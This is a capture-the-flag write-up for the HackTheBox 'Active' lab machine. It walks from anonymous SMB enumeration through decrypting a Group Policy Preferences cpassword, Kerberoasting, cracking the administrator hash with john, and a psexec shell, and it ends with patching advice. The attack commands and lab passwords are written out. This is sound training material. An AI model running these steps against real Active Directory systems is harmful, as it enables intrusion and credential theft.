This is a writeup for the Active machine from the HackTheBox site.
Enumeration #
First, let’s start with a scan of our target with the following command:
nmap -sV -T4 -Pn
Many TCP ports are discovered:
Exploit #
First of all, let’s make an enumeration of the users/shares with the following command:
enum4linux -a
You can find a certain amount of information, but above all, a share is available for reading as an anonymous person. Let’s see what we can find inside. To connect I use the following command:
smbclient --no-pass //
In the share there are two folders, one of which is of particular interest to me: Policies
. In this folder I find the file Groups.xml
which contains information allowing the exploitation of the machine.
Exploiting GPP SYSVOL (Groups.xml) | VK9 Security
And indeed in the file I find 2 important information: name
and cpassword
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
As explained in the article above it is possible to decrypt the cpassword
with the gpp-decrypt
We can therefore deduce the following credencials:
user : active.htb\SVC_TGS
pass : GPPstillStandingStrong2k18
I now look at the permissions I have with these credentials:
I now have access to the share Users
, let’s see what’s inside:
I quickly find the first flag on the desktop of the SVC-TGS user:
Privilege escalation #
To realize the elevation of privilege and since I have the credential of a user, I will do a Kerberoasting.
Kerberoasting is a post-exploitation attack that extracts service account credential hashes from Active Directory for offline cracking.
To perform the hashes extraction I will use the following command:
impacket-GetUserSPNs active.htb/SVC_TGS -dc-ip -outputfile output.txt -request
ββ$ cat output.txt
Bingo, the command finds the hash of the administrator of the machine, now we can perform a dictionary attack locally using john. To do this I use the following command:
john output.txt --wordlist=Documents/wordlist/rockyou.txt
After a few seconds, John gives me the password for the administrator account: Ticketmaster1968
I can verify that the credentials work well with smbmap
Then I can create a reverse shell with psexec
I now have a shell as NT authority
authority and I can get the last flag.
C:\Users\Administrator\Desktop> more root.txt
Recommendations #
To patch this host I think it would be necessary to perform a number of actions:
- Do not leave the
file accessible to everyone - Disable SMB anonymous access
- Use a strong password for the administrator account